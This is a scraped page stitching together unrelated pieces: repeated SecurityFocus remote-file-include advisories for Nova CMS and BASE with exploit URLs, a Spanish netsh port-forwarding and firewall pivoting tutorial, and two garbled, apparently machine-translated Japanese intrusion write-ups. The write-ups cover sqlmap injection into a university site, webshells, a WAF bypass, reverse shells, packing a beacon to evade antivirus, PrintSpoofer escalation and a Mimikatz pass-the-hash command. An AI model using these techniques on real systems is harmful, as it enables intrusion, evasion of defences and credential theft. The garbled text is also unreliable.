HireHackking

source: https://www.securityfocus.com/bid/51976/info Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L]

source: https://www.securityfocus.com/bid/51976/info Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L]

source: https://www.securityfocus.com/bid/51976/info Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. http://www.example.com/novacms/includes/function/gets.php?filename=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Function: include_once File: base_graph_common.php Line: 1 Exploit: http://www.example.com/base/base_graph_common.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Function: include File: base_graph_display.php Line: 2 Exploit: http://www.example.com/base/base_graph_display.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Function: include File: base_db_setup.php Line: 1 Exploit: http://www.example.com/base/base_db_setup.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Function: include_once File: base_graph_form.php Line: 1 Exploit: http://www.example.com/base/base_graph_form.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Function: include File: base_graph_main.php Line: 1 Exploit: http://www.example.com/base/base_graph_main.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Function: include File: base_main.php Line: 15 Exploit: http://www.example.com/base/base_main.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Function: include_once File: base_local_rules.php Line: 1 Exploit: http://www.example.com/base/base_local_rules.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Function: include_once File: base_logout.php Line: 1 Exploit: http://www.example.com/base/base_logout.php?BASE_path=[EV!L]

Netsh es una utilidad de Windows que nos permite hacer Port Forwarding de una forma muy sencilla. Además, la ventaja es que viene por defecto instalado en Windows, aunque la desventaja es que son necesarios privilegios de administrador para poder usarla (al menos de cara al Port Forwarding y el control del firewall). Índice: IntroducciónPort Forwarding con netshControl del Firewall con netsh Introducción Los 3 comandos que vamos a usar son los siguientes: netsh interface portproxy add v4tov4 listenport=<puerto a escuchar> listenaddress=<direccion a escuchar> connectport=<puerto a conectar> connectaddress=<direccion a conectar>netsh interface portproxy show allnetsh interface portproxy reset El laboratorio de este post es el siguiente: 3 EquiposKaliIP: 192.168.10.10Windows 7IP: 192.168.10.40 y 192.168.20.40 –> 2 Interfaces de RedDebian –> Servidor Web y SSH – Puerto 22 y 80 activadosIP: 192.168.20.20 Port Forwarding con netsh Estando en la máquina Windows y teniendo privilegios de administrador, podemos comprobar la tabla de Port Forwarding de netsh con el siguiente comando: netsh interface portproxy show all No nos muestra nada, por lo que está vacía. Así que con el siguiente comando, vamos a hacer el Port Forwarding de los puertos que queramos: netsh interface portproxy add v4tov4 listenport=<puerto a escuchar> listenaddress=<direccion a escuchar> connectport=<puerto a conectar> connectaddress=<direccion a conectar> En el comando se configuran 4 parámetros, cada uno de ellos, sirve para lo siguiente: listenport –> Especificamos el puerto en el que Windows escuchará y que servirá como tunneling para la dirección y puerto que conectemos.listenaddress –> Especificamos la dirección de red en la que escuchará el puerto especificado en listenport. Esto indicará la interfaz en la que se escuchará.connectport –> Especificamos el puerto de la dirección a la que queremos llegarconnectaddress –> Especificamos la dirección a la que queremos llegar Como vemos en la imagen, en principio no aparece nada, ni error ni nada que diga que «ha ocurrido algo». Sin embargo, si ahora ejecutamos el comando anterior para ver la tabla de netsh: Podemos ver como se ha establecido lo que le hemos dicho en los comandos de arriba. Nota: como se explica en el parámetro listenaddress, es importante indicar bien la dirección en la que escuchamos, si indicásemos por ejemplo 127.0.0.1 solo se podrá acceder desde el propio Windows. Sin embargo, indicándole 192.168.10.40 (que también es la IP del Windows), el puerto funcionará en la interfaz 192.168.10.0/24, y, por lo tanto, será accesible para los que tengan acceso a esta red. Aunque también podemos ahorrárnoslo, si no le especificamos el parámetro listenaddress, escuchará en todas las interfaces: Con esto, Windows ya estaría realizando el Port Forwarding, por lo que vamos a comprobarlo desde nuestro kali: Vemos que nos tuneliza perfectamente ambos puertos. Y realmente es tan sencillo como esto. Además, netsh guarda la configuración de los Port Forwarding en el siguiente registro: HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp Si quisiéramos eliminar/resetear la tabla de netsh (también se eliminan los registros), podríamos hacerlo con el siguiente comando: netsh interface portproxy reset Y de esta forma eliminaríamos cualquier tunelización que estemos haciendo, además de sus respectivos registros. Control del Firewall con netsh Otro aspecto muy útil que tiene netsh, es que nos permite controlar el firewall de Windows, añadiendo reglas que por ejemplo un puerto que solo esté accesible de forma interna, se muestre de hacia fuera. Es decir, si por ejemplo una máquina tuviese el SMB solo accesible de forma interna (esto significa que se esté ejecutando, pero solo de forma interna, si no estuviese ejecutándose no serviría de nada), y nosotros tuviésemos credenciales de administrador para usar con PsExec. Podríamos usar netsh para que el puerto SMB se muestre hacia fuera y así conseguir persistencia con PsExec. En este aspecto, los comandos para arreglar reglas son los siguientes: Tráfico entrante: netsh advfirewall firewall add rule name=<nombre de la regla> protocol=TCP dir=in localport=<puerto> action=allow Tráfico saliente: netsh advfirewall firewall add rule name=<nombre de la regla> protocol=TCP dir=out localport=<puerto> action=allow De esta forma el puerto ya estaría expuesto de forma externa. Hay muchas otras opciones en cuanto a firewall, pero a nivel práctico, si necesitásemos una para pivoting, sería esta, la capacidad de mostrar puertos internos de forma externa. Netsh como se ha visto, es una herramienta muy cómoda para pivoting gracias a que viene por defecto en Windows. El único requerimiento como ya se ha dicho, es tener privilegios de Administrador.

0x01はじめに 目標は大学です。穴の掘削プロセス中に、SQL注射に遭遇し、拡張されたハザードをさらに利用しようとしました。脆弱性は、修理のためのプラットフォームに報告されています。 0x02 SQL噴射けがの失敗 IDに2つの単一の引用符を追加し、エラーを報告します。検出後、数値注射であり、スペースがろ過されたことがわかりました。ここでは、 の代わりに/** /を使用できます そこで、私は直接sqlmapに行きました python sqlmap.py -u url - バッチ - tamper=space2comment.py -dbs それがDBAの許可であることがわかった： python sqlmap.py -u url - バッチ - tamper=space2comment.py-is -dba 私はウェブパスを見つけるために多くの方法を試しました 最後に、オペレーティングシステムがFreeBSDであることに気付きました 私は誤ってこのを見ました char（47）は「/」であり、私はすぐにディレクトリを横断し、このを通るパスを見つけることを考えました ルートディレクトリからレイヤーごとにレイヤーを通過することにより、最終的にWebサイトルートディレクトリ：を見つけます シェルの書き込みは失敗し、単一の引用を避けるために16進数に変換します ただし、この注入はサーバー上の機密ファイル（非WEBディレクトリを含む）を読み取ることができます。これは非常に有害です 0x03他のポイントから引き続き試してください SQLインジェクションでコードを読んで、コードレベルのフィルタリングがないことを発見しました。 exploit（）関数は文字列を配列に分割し、スペースで分離します。アレイの最初の1つを取り、スペースを変装してフィルターし、を注入するためにスペースをインラインコメントに置き換えます リークされたデータベースアカウントとパスワードによると、ポート3306に接続する試みは失敗し、ローカルIPがバインドされると推定されています。 ディレクトリを通過し続け、MySQL のログインインターフェイスを発見し続けます ログインした後、空白のインターフェイスがあります。ログインロジックを処理するコードを読むと、ログインが成功し、セッションを直接設定しますが、ジャンプしないことがわかります。ログインした後、ホームページに直接アクセスできます。 secure_file_privを確認して、それがnull値であり、制限がないことを発見しました ログを使用してWebShellに書き込み、ログパス を設定する許可がないことを確認してください Webサイトバックエンドを見つけました データベースにあるアカウントとパスワードのハッシュ値 オンラインWebサイトの復号化ハッシュは、単純なテキストの価値があります ログインに失敗し、ソースコード をお読みください 塩が追加されていることがわかったので、塩を追加して復号化して正しいパスワードを取得しました ログインに正常にログインした後、新しいスタッフデータ管理アドオンに写真をアップロードする場所を見つけました ただし、Image Files のみをアップロードできます アップロードが成功した後、SQLでシェルの書き込みの失敗がディレクトリの権限によるものであるかどうかを突然考えました。ウェブサイトは、アップロードされたディレクトリを除く他のディレクトリを書くことができないことを制限しましたか？ そこで、私はシェルに書き込もうとしました 成功は確かにディレクトリの書き込み許可問題です 私はアリの剣を接続できないことを発見し、WAFがトラフィックを傍受したと推定されました。アリの剣の交通暗号化を見ました。 Ant Swordには、Ant Sword Trafficの重要な機能があります。つまり、ユーザーエージェントはAntsword/バージョンです。さらに、エンコーダーを使用する場合は、デコード機能を送信する必要があるため、デコード機能も機能であり、カスタムエンコーダーとデコーダーが必要です。 2つのファイルAntsword-Master/modules/request.jsおよびAntsword-master/modules/update.jsのユーザーエージェントを変更した後、正常に接続されました。 WAFは、UA の明らかな特徴のみを傍受しました リバウンドシェルが失敗し、NCはTCP/UDPプロトコルに基づいているため、リバウンドコマンドが存在せず、アウトバウンドIPが禁止され、アウトバウンドポートが禁止されています。 SHが存在することを確認： アウトバウンドポートは、外部ネットワークにアクセスすることです。ネットワーク接続を照会すると、ポート54454が終了できることがわかります。 したがって、ポート54454を聴いた後、シェルはに成功しました 電力のエスカレーションは失敗しました。サーバーカーネルバージョンが高すぎるため、カーネルの脆弱性を使用して権利を増やすことは不可能です。タスク、環境変数、および権利を増やすためにSUIDを計画しようとすると、それを使用する場所がないことがわかります。 Sudoは権利を増やすために、およびサードパーティのサービスでは、プラグインディレクトリは、複数のファイルの許可も正常に構成されており、他の機密情報が漏れていないことがわかります。 0x04要約 1。ターゲットシステムに単一の引用符を追加してエラーを報告しますが、フィルタースペースをバイパスする代わりに/**/使用できます。Spy2comment.pyスクリプトを使用してSqlmap.py -u http://ip/newform.php？ sqlmap.py -u 3http://ip/newform.php？id=123 - バッチ - tamper=space2comment.py-is -dba //それがDBAであるかどうかを確認してください。システムにはDBAアクセス許可があります。 3。NAMPスキャンを通じて、ターゲットシステムはFreedBになります（Sunosも可能です）。 load_file（）関数を等型化し、ディレクトリ3を直接通過できます3。ターゲットシステムディレクトリhttp://ip/newform.php？id=123/**/union/**/select/**/1、load_file（ '/'）、3,4,5,6,7,83を読み取ります。 Webサイトルートディレクトリ3http://IP/newform.php？id=123/**/**/select/**/1、load_file（ '/home/db/www/'）、3,4,5,6,7,84をお読みください。 WebShellに書き込み失敗し、データベース構成ファイルを読み取ろうとしました。 Webサイトのデータベースのユーザー名とパスワードが表示されます。ウェブサイトのユーザー名とパスワードが表示されます。ウェブサイトのユーザー名とパスワードが表示されます。ユーザー名とパスワードは、PMBPデータベース管理者ページにログインするために使用されます。ただし、空白スペースをバックグラウンド管理ページに表示して、データベース管理ページに直接アクセスすることはできません。 6。SQLステートメントクエリの許可、空の表示、および「Secure_file_priv'7のような表示変数」の制限なし。ただし、MySQLのログを介してシェルに書き込むことは失敗しており、記述されたディレクトリアクセス許可に制限がある可能性があります。 8。ディレクトリスキャンを通じて、ディレクトリシステムのバックグラウンド管理を見つけます。ここでの背景のユーザー名とパスワードは、SQLMapを介して直接読み取ることができ、ユーザー名とパスワードのハッシュを持つことができ、パスワードはMD5を介して正常に復号化されます。システムに正常にログインすることはできず、パスワードが正しくない場合があります。 9。Load_File（）関数を介してバックグラウンド管理ページを読み、パスワードが塩漬けであることを確認します。ここに塩を追加し、それを復号化して正しいパスワードを取得し、ターゲットの背景10に正常にログインします。 11。パラメーターは、MySQLを介して画像の絶対パスアドレスに1つの文にアリの剣を書きます。 12は正常に記述できます。文はアングリの剣を通して書くことができますが、接続は成功しておらず、WAFによって傍受される可能性があります。ここでは、Angri Swordのユーザーエージェントを変更し、エンコーダBAA64のエンコードを使用してWAF傍受をバイパスしてリンクに成功させる必要があります。 Antsword-Master/modules/request.jsおよびAntsword-Master/modules/update.jsの2つのファイルのユーザーエージェントを変更した後、それは成功し、bas6413をエンコードするコードを使用してNCを介してリバウンドしました。リバウンドが失敗したことがわかった。ターゲットシステムがアウトバウンドIPを禁止し、TCPプロトコルアウトバウンドポートを禁止したことがわかっており、アウトバウンドポートが外部ネットワークにアクセスしていることがわかりました。ネットワーク接続を照会すると、ポート54454がアウトバウンドになる可能性があることがわかりました。 NC -LVVP 544454オリジナルリンク：https://xz.aliyun.com/t/10527

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_payload.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/base_maintenance.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_cache.inc.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_action.inc.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/help/base_setup_help.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_include.inc.php?BASE_path=[EV!L]

序文 この記事は、型破りな手段を使用してセキュリティ戦略を突破するためのイントラネット浸透記録です。 周囲の説明 WebベースのGetShell、WebShellはIce Scorpionであり、NETの権限、非常に低い権限、サーバーはサーバー2016であり、ターゲットはネットワークを離れません！には、アンチウイルスソフトウェア（Tureng、MicrosoftのWD）が装備されており、ASMIはデフォルトで有効になっており、電源シェルには特別なポリシー制限があります。TCP、ICMP、およびDNSプロトコルは接続されておらず、パブリックネットワークのCSサーバーとの接続を直接確立することは不可能です。 （イントラネットのCSサーバーは、それとの接続を確立できません）パブリックネットワークは、ターゲットWebサービス（Pure Intranet Web Service）にアクセスできません。 アウトバウンドルール：非ポート8080ポートは、外の世界と通信することは許可されていません。 トポロジ図を手に取り、それを見てください。 なぜオンラインでcs に行くべきなのか Webシェル許可は低すぎて非常に制限があります。 CSは反射DLLを使用してPEプログラムをロードするため、CSをオンラインで提起する必要があります。そのため、Mimikatzパスワードグラビングやその他の操作など、いくつかの機密操作を実行するときにバイパスで特定の役割を果たすことができます。 LSAをローカルにダンプするように、その後、Webシェルの許可が低すぎるため、LSAを投棄するには少なくとも管理者の権限が必要なため、機能しません。 さらに、ターゲットネットワーク環境は比較的厳しいです。 HTTPプロトコル以外の通信はファイアウォールによって傍受され、通常のインタラクティブ関数を備えたシェルを確立することは不可能です。 ポイント1：Pystinger Reverse Proxyを使用してCS を起動します 関連情報を確認した後、インターネット上の記事のほとんどがPystingerを使用してイントラネットリバースプロキシを実装し、HTTPプロトコルを使用してターゲットマシンポートをCSSサーバーリスニングポートにマッピングして、WebサービスにアクセスせずにCSSで起動できるようにすることがわかりました。ただし、ここには問題があります。パブリックネットワークCSサーバーは、ターゲットWebサービスにアクセスできません。同じイントラネット上のマシンのみがターゲットWebサービスにアクセスできます。したがって、サーバー上にPystingerを直接構築して、ターゲットマシンポートをパブリックネットワークCSリスニングポートにプロキシを逆にすることは不可能です。 ここでの解決策は、マシン上にCSSサービスを直接構築し、Pystinger抗ジェネレーション操作を実行することです。 ローカルCSサービスがを開始します。バックアップタイプのリスナーを定期的に構成し、リスニングポート60020（上記の図の6002の0 .）proxy.aspxはターゲットサーバーにアップロードされます。アクセス： 4. stinger_server.exeをターゲットサーバーにアップロードし、コマンドを実行します：d: \ stinger_server.exe 0.0.0.0を開始 5。スプリングボードマシンのローカル実行コマンド：Stinger_Client -W http://10.1.1.1:8080/2.ASPX -L 0.0.0.0 -P 4002 6.キルを削除してResever_Bindを処理し、ターゲットにアップロードして実行しますが、オンラインになりません。タスクリストを実行した後、shell.exeが実行されていることがわかりますが、オンラインでは行かず、Pystingerはエラーを報告します。 最終結果は、エラーが報告されていることです。特定の理由は不明です。ターゲットWeb環境に問題があるか、バックアップタイプのシェル通信に問題がある可能性があります。 したがって、Pystingerの抗ジェネレーションの打ち上げは失敗しました。 ポイント2：フォワードプロキシ +フォワードシェルオンラインパブリックネットワークCS 逆プロキシが機能しないため、フォワードプロキシを使用してから、フォワードシェルを使用して接続します。 ターゲットマシンはネットワークを離れることはなく、ターゲットマシンはスプリングボードマシンとして使用して、ターゲットマシンの前方のシェルを引き出すことができます。 回路図：一般的なHTTPトンネリングツールNeo-RegeorgとRegeorg（これら2つはもっと頻繁に使用する必要があります）は、ほとんどのネットワーク環境で使用できますが、ここでは不可能です。スプリングボードマシンは、CSサーバーから直接切断されます。 CS Connect Forward接続要求は、Springboard Machineのビーコンによって発行されます。接続要求がフォワードシェルのリスニングポートに接続できるようにするために、ビーコンをソックストンネルにプロキシするだけです。ただし、ターゲットマシンはネットワークを離れないため、スプリングボードマシンのビーコンがプロキシトンネルに入った後、パブリックネットワーク上のCSサーバーに接続できないため、ポート間マッピングのみになり、HTTPプロトコルを使用してソックストンネルを構築することはできません（私は推測します）。したがって、ここでは、HTTPトンネル構造にABPTTSを使用します。 Abpttsの利点 優れた敵対的な特徴の検出 作成されたトンネルは、非常に安定した 1。 Abpttsを構成： Python AbpttsFactory.py -o Server \\サーバースクリプトを生成し、初期化します。 2。サーバースクリプトをターゲットマシンにアップロード ポイント3：ファイルアップロード この場所では、Ice ScorpionとMalaysiaはファイルをアップロードできません。 Godzillaの大きなファイルアップロードを使用してAbptts.aspxのアップロードのみを使用できます（後続のExeアップロードはGodzillaの大きなファイルアップロード機能も使用します）Exeファイルも落とし穴です。通常の環境では、certutil、powershell、その他の方法を使用してexeをターゲットにダウンロードできますが、このマシンはネットワークを離れません。アウトバウンドルールにより、イントラネット内の他のマシンのWebサーバーにアクセスすることさえできません。最後に、ゴジラの大きなファイルのアップロードが解決されました。 アップロード後のAbptts.aspxのアドレス：http://10.1.1.1.133608080/abptts.aspx abptts.aspxにアクセスすると、ページは暗号文の長いリストをエコーして、ABPTTSクライアントが通常であることを示します 3。 HTTPトンネルを開始 Python abpttsclient.py -c server/config.txt -u 'http://10.1.1.1:8080/abptts.asptts.asptts. -f 127.0.0.1:7777/127.0.0.133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333:1111 ここでは、127.0.0.1:7777がネイティブポートであり、127.0.0.13360111111111111111111111111111111111111111111111個 これは、ターゲットマシンの1111ポートがHTTPトンネルを介してローカルポート7777にマッピングされ、ローカルポート7777に送信するすべてのリクエストがターゲットマシンの1111ポートに転送されることを意味します。 ポイント4：前方バインドは殺されません CSのフロントシェル紹介（ビーコンTCP） フォワードシェルの原則は、Bindがターゲットマシンにリスニングポートを開き、他のホストがこのリスニングポートにアクセスするのを待っていることであり、子供のビーコンはCSサーバーと直接通信するのではなく、親のビーコンからの要求を受け入れます。 リバースシェルは、CSサーバーのリスニングポートにアクセスするリクエストを開始するターゲットによってフォワードリスナーを作成します：は、前方負荷を生成します（前方負荷を生成するときにのみ選択できます）。通常、この場合。 フォワードシェルが採用されている場合、そのインバウンドルールがどれほど厳格であっても、ローカルポート間の通信はブロックされないため、厳格なインバウンドルールポリシーをバイパスできます。通信プロセス：CSサーバー（パブリックネットワーク） - スプリングボードマシン（親ベーコン） - ポート7777-ターゲットポート8080（HTTPトンネル） - ターゲットポート11111（チャイルドベコン）ターゲットマシンのファイアウォールでのビパス分析、地元のポート1111との対話機関では、地元のポートマシンとの通信があります。インバウンドおよび終了ポリシー。 なぜ前方シェルを使用するのか： 上記は、ターコイズとWDの2つのウイルス原虫が2つあり、前方シェルを直接アップロードすることは間違いなく即座に殺されることを上記で述べています。ローカルテストでは毒が報告されます。 Reserver_Bindは、殺害を避けるのが比較的簡単です。自由な殺害やその他の方法を分離することにより、シェルコードを直接生成し、シェルコードをロードします。 ただし、フォワードシェルはシェルコードを生成できません。それは雄弁なビーコンに属し、雄弁なビーコンはシェルコードを生成できないため、キルの定期的な分離を通じてアンチウイルスをバイパスすることはできません。 StagerとStagerlessの違いについて言及させてください： StagerおよびStagerless BeaconStagerタイプ：単純な負荷ロジックパーツのみが含まれています。ステージャーは、C2のペイロードをメモリにロードして、PE負荷を実現します。このロード方法は、反射的なDLLロードです。ステージャーのないタイプ：Stager+Payloadの執筆全体はTrojan Horseにあり、サイズが大きく、Stagerタイプでより明白です。下の図からわかるように、ペイロードを生成するときに前方のバインドリスナーオプションはありません。リザーブリスナーオプションのみです。 ローダーメソッドを難読化することで殺害を避けることは不可能であるため、シェル +ポジショニング機能コード法を強化して、殺害を避けます。ほとんどの国内ウイルスアンチウイルスソフトウェアは、ファジーハッシュアルゴリズムに基づいた機能コード検索と殺害に基づいていると推定されています。コード層の強力な難読化は、ほとんどのウイルス症、強いシェル（Aspack、UPX、Safengine、VMPojent、実際のテストASPACK、UPXがあまり効果的ではない）をほぼバイパスできます。使用される主なツール：Virtest5.0+リソースハッカー+SafeNgineshielden+upxvirtest5.0： 機能コードの自動位置。組み立てることができないため、010Editorを使用して、機能コードの16進システムを変更して、ループ機能コードを壊します。 機能コードを変更するその他の方法:アセンブリ関数を交換し、命令順序を変更し、ゼロジャンプを交換します。 注：機能コードを変更した後、EXEが正常に実行できるかどうかをテストする必要があります。 SafeNgineshielden Anti-LPKインジェクション、アンチドバガーアタッチメント、アンチメモリダンプ、および完全な複雑さを選択し、仮想マシンの検出を確認しないでください。 最後に、UPXシェルの層を追加します（UPXシェルは状況に依存し、UPXシェルを追加すると殺害を引き起こすことがあります）。リソースハッカーは任意のアイコンファイルを追加し、カメを正常に通過させます。 前方bind-free ICEサソリにd:/beacon_se.exeを実行して実行します。トロイの木馬がターゲットマシンにポート1111を開くことがわかります。 HTTPトンネルを使用して、ターゲットマシンのポート11111にある前方バインドに接続します。 ターゲットマシンは前方シェルを実行します ネイティブ（攻撃者）はスプリングボードマシンとしてオンラインで行き、ネイティブシェルで実行します 接続127.0.0.1 7777 10.1.1.1の前方に正常に発売されましたが、オンラインシェルの権限は非常に低く、Mimikatzは実行できません。前方シェルのため、たとえ右リフトが成功したとしても、シェルを直接リバウンドすることはできません。さらに、ターゲットシステムは2016年であるため、プラグインの一般的なエスカレーションスクリプトはエスカレーションに失敗します。 このマシン（スプリングボード）フォワード接続シェル ターゲットホストにprintspoofer.exeをアップロードします。 次のコマンドを実行して、システム許可を使用してフォワードシェルを実行するには、ASPの低い権限シェルの代わりにシステム権限を備えたシェルを取得します。 c: \ windows \ temp \ printspoofer -c d:/1111_se.exe Netstat -Anoは、ローカルに1111ポートが開いているかどうかを確認します。 フォワードシェルは正常に実行されており、スプリングボードマシンは再びフォワードバインドに接続されています。 接続127.0.0.1 7777 権力は成功裏に上昇し、戦いは基本的に終わりました。システム許可が取得されました。ミミカッツはパスワードをつかみましたが、明確なテキストはありませんでしたが、ハッシュを取得できました。 printspooferエスカレーション Net1は名前を変更し、ユーザーを追加しました。エラーが報告されている場合、Turfurによって傍受されたに違いありません。キラーは層を直接駆動して柔らかく殺します。 局所的な実験は排除できますが、目標の観点から達成できない理由はわかりません。アイデアの変更：国内のウイルス対策傍受およびその他のウイルス対策傍受およびユーザーコマンドは、多くの場合、NetとNet1の2つのプロセスをターゲットにしているだけであり、フックの根底にある機能はありません。原則は詳細に分析されておらず、インターネット上に記事があります。 Windows APIに管理者ユーザーを追加します プロジェクトアドレス：https://github.com/newsoft/adduser ウイルス対策をバイパスすると、ユーザーが追加されました。次のステップは、定期的な操作、プリンターの脆弱性を使用してアクセス許可を増やし、SYS許可を使用して、管理者ユーザーのデスクトップに切り替えることでした。ハッシュパス攻撃 または、それはハッシュパスであり、管理者のデスクトップに直接あります。 sekurlsa:3360pth /user3360administrator /domain:username /ntlm:194f34439dd27846db00c6723036da6b ' /run3:mstsc.exe /RECRITEDADMIN'194F34439DD27846DB00C6723036DA6B ハッシュ配信の利点は、動きが少なく、新しいユーザーが必要であり、痕跡が少なくなり、攻撃者が発見される可能性が低下することです。下の図に示すように： 上記の操作と同じように、相手のポート3389をローカルエリアに逆に逆にして接続します。 最後に、ログインデスクトップのスクリーンショットを添付しました。ログインしたとき、バックスタブからエラーを報告しました。これは、タートルを乾燥させていたときに私がうまく殺さなかった理由を説明しています（プログラムの互換性の問題のためにクラッシュしました）。

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_db.inc.php?path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_output_query.inc.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_output_html.inc.php?BASE_path=[EV!L]

source: https://www.securityfocus.com/bid/51979/info BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities. An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. BASE 1.4.5 is vulnerable; other versions may be affected. Exploit: http://www.example.com/base/includes/base_state_criteria.inc.php?BASE_path=[EV!L]

